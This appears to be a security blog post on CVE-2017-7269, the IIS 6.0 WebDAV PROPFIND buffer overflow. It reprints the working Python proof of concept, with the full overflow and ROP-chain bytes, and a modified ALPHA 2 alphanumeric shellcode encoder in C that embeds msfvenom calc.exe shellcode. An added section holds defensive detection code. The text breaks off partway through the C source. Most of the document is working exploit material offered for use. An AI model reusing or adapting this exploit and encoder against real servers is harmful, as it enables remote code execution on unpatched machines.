IIS6.0 CVE-2017-7269

IIS/6.0 MS-Author-Via: DAV


Original PoC:

#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
# Python 2 script: the payload is a byte string, sent as one PROPFIND request.
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', 80))

pay = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
# The If: header carries two tagged resources; the overlong URLs inside them
# trigger the overflow and hold the ROP chain. The '\x..' runs are UTF-8 bytes
# chosen so that their UTF-16 form is the data that ends up on the stack.
pay += 'If: <http://localhost/aaaaaaa'
pay += '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay += '>'
pay += ' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay += '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'

# Alphanumeric (ALPHA 2 style, unicode-proof) encoded shellcode that pops calc.exe
shellcode = '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'

pay += shellcode
pay += '>\r\n\r\n'

print pay
sock.send(pay)
data = sock.recv(80960)
print data
sock.close()
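Two offline checks a practitioner would want beside the PoC above, as an added example that is not part of the original post or of the PoC authors' code: a reader for the OPTIONS response that tells whether a server advertises WebDAV the way IIS 6.0 does (the `MS-Author-Via: DAV` header noted at the top of this page plus PROPFIND in `Allow`), and an inspector for a raw PROPFIND request that parses the `If:` header into its `<...>` tagged resources and flags the shape of the payload shown above (non-ASCII bytes and tags far longer than any real URI or lock token). The sample response and requests are constructed here, and the length threshold `MAX_TAG_LEN` is an assumption, not a value from the advisory.

```python
"""Offline checks for the WebDAV request shape used by the CVE-2017-7269 PoC.

Added example, not part of the original post. The OPTIONS response and the
PROPFIND requests below are constructed; MAX_TAG_LEN is an assumed threshold.
"""
import re

MAX_TAG_LEN = 128  # assumption: genuine <URI> / <locktoken:...> tags are short


def parse_headers(raw: bytes):
    """Split a raw HTTP message into (start line, {lowercased name: value})."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")  # first colon only: values hold URLs
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def webdav_enabled(options_response: bytes) -> bool:
    """True when the server answers OPTIONS like IIS 6.0 with WebDAV on."""
    _, h = parse_headers(options_response)
    allow = h.get(b"allow", b"").upper()
    return h.get(b"ms-author-via", b"").upper() == b"DAV" and b"PROPFIND" in allow


def if_header_tags(if_value: bytes):
    """Return the contents of every <...> tagged resource in an If: header."""
    return re.findall(rb"<([^>]*)>", if_value, re.DOTALL)


def suspicious_if_header(request: bytes):
    """List the reasons a PROPFIND request looks like the overflow payload."""
    start, h = parse_headers(request)
    reasons = []
    if not start.startswith(b"PROPFIND "):
        return reasons
    if_value = h.get(b"if")
    if if_value is None:
        return reasons
    for tag in if_header_tags(if_value):
        if any(b > 0x7F for b in tag):
            reasons.append("non-ASCII bytes in If tag")
        if len(tag) > MAX_TAG_LEN:
            reasons.append(f"If tag of {len(tag)} bytes exceeds {MAX_TAG_LEN}")
    return reasons


# --- constructed samples -----------------------------------------------------
SAMPLE_OPTIONS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"MS-Author-Via: DAV\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    b"PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    b"DAV: 1, 2\r\n\r\n"
)

BENIGN_REQUEST = (
    b"PROPFIND /docs/ HTTP/1.1\r\nHost: localhost\r\n"
    b"If: <http://localhost/docs/> "
    b"(<opaquelocktoken:e71d4fae-5dec-22d6-fea5-00a0c91e6be4>)\r\n\r\n"
)


def build_propfind(filler: bytes) -> bytes:
    """Same two-tag If: layout as the published PoC, with constructed filler."""
    return (b"PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
            b"If: <http://localhost/aaaaaaa" + filler + b">"
            b" (Not <locktoken:write1>) <http://localhost/bbbbbbb" + filler
            + b">\r\n\r\n")


# 120 repeats of two CJK characters = 720 UTF-8 bytes, all >= 0x80 (constructed)
PAYLOAD_SHAPED_REQUEST = build_propfind("\u6f68\u7863".encode("utf-8") * 120)

if __name__ == "__main__":
    print("WebDAV enabled:", webdav_enabled(SAMPLE_OPTIONS_RESPONSE))
    print("benign:", suspicious_if_header(BENIGN_REQUEST))
    print("payload-shaped:", suspicious_if_header(PAYLOAD_SHAPED_REQUEST))
```

`suspicious_if_header` reports per tag, so the PoC layout (two overlong non-ASCII tags) yields four findings; a legitimate `If:` header with a URI and a lock token yields none.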



Anyone who has done some pwn knows that getting from an overflow to shellcode execution usually takes a ROP chain to pivot into the shellcode. The `shellcode` variable in the author's code is obviously the payload that actually runs (the code that launches the calculator); everything before it is the overflow and the ROP chain.

The shellcode in the PoC consists entirely of letters and digits, so it was presumably produced with an ALPHA-series alphanumeric shellcode encoder.

The modified ALPHA 2 source is below; it can be compiled into an exe with VS2015.



// Alpha2.cpp : Defines the entry point for the console application.
//
#include <stdio.h>    // printf(), fprintf(), stderr
#include <stdlib.h>   // exit(), EXIT_SUCCESS, EXIT_FAILURE, srand(), rand()
#include <string.h>   // strcmp(), strlen()
// #include <sys/time.h> // struct timeval, struct timezone, gettimeofday():
//                         not available on MSVC, so the seeding code in main()
//                         is commented out and the output is deterministic
#ifndef _MSC_VER
#include <strings.h>            // strcasecmp()
#define _stricmp strcasecmp     // MSVC spelling used below
#endif

#define VERSION_STRING "ALPHA 2: Zero-tolerance. (build 07)"
#define COPYRIGHT      "Copyright (C) 2003, 2004 by Berend-Jan Wever."

/*
________________________________________________________________________________
    ,sSSs,,s,  ,sSSSs,  ALPHA 2: Zero-tolerance.
  SS"  Y$P"  SY"  ,SY
  iS'  dY      ,sS"  Unicode-proof uppercase alphanumeric shellcode encoding.
  YS,  dSb    ,sY"      Copyright (C) 2003, 2004 by Berend-Jan Wever.
  `"YSS'"S' 'SSSSSSSP
________________________________________________________________________________

This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
details.

A copy of the GNU General Public License can be found at:
  http://www.gnu.org/licenses/gpl.html
or you can write to:
  Free Software Foundation, Inc.
  59 Temple Place - Suite 330
  Boston, MA  02111-1307
  USA.

Acknowledgements:
  Thanks to rix for his phrack article on alphanumeric shellcode.
  Thanks to obscou for his phrack article on unicode-proof shellcode.
  Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.
*/

#define mixedcase_w32sehgetpc          "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36" \
                                       "FFFFTXVj0PPTUPPa301089"
#define uppercase_w32sehgetpc          "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYY" \
                                       "P5YYYD5KKYAPTTX638TDDNVDDX4Z4A638618" \
                                       "16"
#define mixedcase_ascii_decoder_body   "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
#define uppercase_ascii_decoder_body   "VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0B" \
                                       "BXP8ACJJI"
#define mixedcase_unicode_decoder_body "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIA" \
                                       "IAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA" \
                                       "ZBABABABABkMAGB9u4JB"
#define uppercase_unicode_decoder_body "QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5" \
                                       "AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABAB" \
                                       "QI1AIQIAIQI1111AIAJQI1AYAZBABABABAB3" \
                                       "0APB944JB"

struct decoder {
  const char* id;   // id of option
  const char* code; // the decoder
} mixedcase_ascii_decoders[] = {
  { "nops",     "IIIIIIIIIIIIIIIIII7" mixedcase_ascii_decoder_body },
  { "eax",      "PYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "ecx",      "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "edx",      "JJJJJJJJJJJJJJJJJ7RY" mixedcase_ascii_decoder_body },
  { "ebx",      "SYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "esp",      "TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "ebp",      "UYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "esi",      "VYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "edi",      "WYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp-10]", "LLLLLLLLLLLLLLLLYIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp-C]",  "LLLLLLLLLLLLYIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp-8]",  "LLLLLLLLYIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp-4]",  "LLLL7YIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp]",    "YIIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp+4]",  "YYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp+8]",  "YYYIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp+C]",  "YYYYIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp+10]", "YYYYYIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp+14]", "YYYYYYIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp+18]", "YYYYYYYIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp+1C]", "YYYYYYYYIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "seh",      mixedcase_w32sehgetpc "IIIIIIIIIIIIIIIII7QZ" // ecx code
                mixedcase_ascii_decoder_body },
  { NULL, NULL }
}, uppercase_ascii_decoders[] = {
  { "nops",     "IIIIIIIIIIII" uppercase_ascii_decoder_body },
  { "eax",      "PYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "ecx",      "IIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "edx",      "JJJJJJJJJJJRY" uppercase_ascii_decoder_body },
  { "ebx",      "SYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "esp",      "TYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "ebp",      "UYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "esi",      "VYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "edi",      "WYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "[esp-10]", "LLLLLLLLLLLLLLLLYII7QZ" uppercase_ascii_decoder_body },
  { "[esp-C]",  "LLLLLLLLLLLLYIIII7QZ" uppercase_ascii_decoder_body },
  { "[esp-8]",  "LLLLLLLLYIIIIII7QZ" uppercase_ascii_decoder_body },
  { "[esp-4]",  "LLLL7YIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "[esp]",    "YIIIIIIIIII7QZ" uppercase_ascii_decoder_body },
  { "[esp+4]",  "YYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "[esp+8]",  "YYYIIIIIIIII7QZ" uppercase_ascii_decoder_body },
  { "[esp+C]",  "YYYYIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "[esp+10]", "YYYYYIIIIIIII7QZ" uppercase_ascii_decoder_body },
  { "[esp+14]", "YYYYYYIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "[esp+18]", "YYYYYYYIIIIIII7QZ" uppercase_ascii_decoder_body },
  { "[esp+1C]", "YYYYYYYYIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "seh",      uppercase_w32sehgetpc "IIIIIIIIIIIQZ" // ecx code
                uppercase_ascii_decoder_body },
  { NULL, NULL }
}, mixedcase_ascii_nocompress_decoders[] = {
  { "nops",     "7777777777777777777777777777777777777" mixedcase_ascii_decoder_body },
  { "eax",      "PY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "ecx",      "77777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "edx",      "77777777777777777777777777777777777RY" mixedcase_ascii_decoder_body },
  { "ebx",      "SY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "esp",      "TY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "ebp",      "UY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "esi",      "VY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "edi",      "WY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp-10]", "LLLLLLLLLLLLLLLLY777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp-C]",  "LLLLLLLLLLLLY7777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp-8]",  "LLLLLLLLY77777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp-4]",  "LLLL7Y77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp]",    "Y7777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+4]",  "YY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+8]",  "YYY77777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+C]",  "YYYY7777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+10]", "YYYYY777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+14]", "YYYYYY77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+18]", "YYYYYYY7777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "[esp+1C]", "YYYYYYYY777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
  { "seh",      mixedcase_w32sehgetpc "77777777777777777777777777777777777QZ" // ecx code
                mixedcase_ascii_decoder_body },
  { NULL, NULL }
}, uppercase_ascii_nocompress_decoders[] = {
  { "nops",     "777777777777777777777777" uppercase_ascii_decoder_body },
  { "eax",      "PY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "ecx",      "7777777777777777777777QZ" uppercase_ascii_decoder_body },
  { "edx",      "7777777777777777777777RY" uppercase_ascii_decoder_body },
  { "ebx",      "SY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "esp",      "TY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "ebp",      "UY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "esi",      "VY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "edi",      "WY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp-10]", "LLLLLLLLLLLLLLLLY77777QZ" uppercase_ascii_decoder_body },
  { "[esp-C]",  "LLLLLLLLLLLLY777777777QZ" uppercase_ascii_decoder_body },
  { "[esp-8]",  "LLLLLLLLY7777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp-4]",  "LLLL7Y7777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp]",    "Y777777777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+4]",  "YY77777777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+8]",  "YYY7777777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+C]",  "YYYY777777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+10]", "YYYYY77777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+14]", "YYYYYY7777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+18]", "YYYYYYY777777777777777QZ" uppercase_ascii_decoder_body },
  { "[esp+1C]", "YYYYYYYY77777777777777QZ" uppercase_ascii_decoder_body },
  { "seh",      uppercase_w32sehgetpc "7777777777777777777777QZ" // ecx code
                uppercase_ascii_decoder_body },
  { NULL, NULL }
}, mixedcase_unicode_decoders[] = {
  { "nops",     "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
  { "eax",      "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "ecx",      "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
  { "edx",      "RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "ebx",      "SSYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "esp",      "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "ebp",      "UUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "esi",      "VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "edi",      "WWYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { "[esp]",    "YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44" mixedcase_unicode_decoder_body },
  { "[esp+4]",  "YUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
  { NULL, NULL }
}, uppercase_unicode_decoders[] = {
  { "nops",     "IAIAIAIA4444" uppercase_unicode_decoder_body },
  { "eax",      "PPYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "ecx",      "IAIAIAIA4444" uppercase_unicode_decoder_body },
  { "edx",      "RRYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "ebx",      "SSYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "esp",      "TUYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "ebp",      "UUYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "esi",      "VVYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "edi",      "WWYAIAIAIAIA" uppercase_unicode_decoder_body },
  { "[esp]",    "YAIAIAIAIA44" uppercase_unicode_decoder_body },
  { "[esp+4]",  "YUYAIAIAIAIA" uppercase_unicode_decoder_body },
  { NULL, NULL }
}, mixedcase_unicode_nocompress_decoders[] = {
  { "nops",     "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "eax",      "PPYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "ecx",      "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "edx",      "RRYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "ebx",      "SSYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "esp",      "TUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "ebp",      "UUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "esi",      "VVYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "edi",      "WWYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "[esp]",    "YA4444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { "[esp+4]",  "YUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
  { NULL, NULL }
}, uppercase_unicode_nocompress_decoders[] = {
  { "nops",     "44444444444444" uppercase_unicode_decoder_body },
  { "eax",      "PPYA4444444444" uppercase_unicode_decoder_body },
  { "ecx",      "44444444444444" uppercase_unicode_decoder_body },
  { "edx",      "RRYA4444444444" uppercase_unicode_decoder_body },
  { "ebx",      "SSYA4444444444" uppercase_unicode_decoder_body },
  { "esp",      "TUYA4444444444" uppercase_unicode_decoder_body },
  { "ebp",      "UUYA4444444444" uppercase_unicode_decoder_body },
  { "esi",      "VVYA4444444444" uppercase_unicode_decoder_body },
  { "edi",      "WWYA4444444444" uppercase_unicode_decoder_body },
  { "[esp]",    "YA444444444444" uppercase_unicode_decoder_body },
  { "[esp+4]",  "YUYA4444444444" uppercase_unicode_decoder_body },
  { NULL, NULL }
};

struct decoder* decoders[] = {
  mixedcase_ascii_decoders, uppercase_ascii_decoders,
  mixedcase_unicode_decoders, uppercase_unicode_decoders,
  mixedcase_ascii_nocompress_decoders, uppercase_ascii_nocompress_decoders,
  mixedcase_unicode_nocompress_decoders, uppercase_unicode_nocompress_decoders
};

// Raw shellcode to encode (replaces the stdin input of the original ALPHA 2):
// msfvenom -p windows/exec CMD="calc.exe" -f c -b '\x00'
unsigned char evil[] =
"\xda\xd1\xd9\x74\x24\xf4\x58\xba\x05\xf6\xdf\x74\x29\xc9\xb1"
"\x31\x83\xc0\x04\x31\x50\x14\x03\x50\x11\x14\x2a\x88\xf1\x5a"
"\xd5\x71\x01\x3b\x5f\x94\x30\x7b\x3b\xdc\x62\x4b\x4f\xb0\x8e"
"\x20\x1d\x21\x05\x44\x8a\x46\xae\xe3\xec\x69\x2f\x5f\xcc\xe8"
"\xb3\xa2\x01\xcb\x8a\x6c\x54\x0a\xcb\x91\x95\x5e\x84\xde\x08"
"\x4f\xa1\xab\x90\xe4\xf9\x3a\x91\x19\x49\x3c\xb0\x8f\xc2\x67"
"\x12\x31\x07\x1c\x1b\x29\x44\x19\xd5\xc2\xbe\xd5\xe4\x02\x8f"
"\x16\x4a\x6b\x20\xe5\x92\xab\x86\x16\xe1\xc5\xf5\xab\xf2\x11"
"\x84\x77\x76\x82\x2e\xf3\x20\x6e\xcf\xd0\xb7\xe5\xc3\x9d\xbc"
"\xa2\xc7\x20\x10\xd9\xf3\xa9\x97\x0e\x72\xe9\xb3\x8a\xdf\xa9"
"\xda\x8b\x85\x1c\xe2\xcc\x66\xc0\x46\x86\x8a\x15\xfb\xc5\xc0"
"\xe8\x89\x73\xa6\xeb\x91\x7b\x96\x83\xa0\xf0\x79\xd3\x3c\xd3"
"\x3e\x2b\x77\x7e\x16\xa4\xde\xea\x2b\xa9\xe0\xc0\x6f\xd4\x62"
"\xe1\x0f\x23\x7a\x80\x0a\x6f\x3c\x78\x66\xe0\xa9\x7e\xd5\x01"
"\xf8\x1c\xb8\x91\x60\xcd\x5f\x12\x02\x11";

void version(void) {
  printf(
    "________________________________________________________________________________\n"
    "\n"
    "    ,sSSs,,s,  ,sSSSs,  " VERSION_STRING "\n"
    "  SS\"  Y$P\"  SY\"  ,SY \n"
    "  iS'  dY      ,sS\"  Unicode-proof uppercase alphanumeric shellcode encoding.\n"
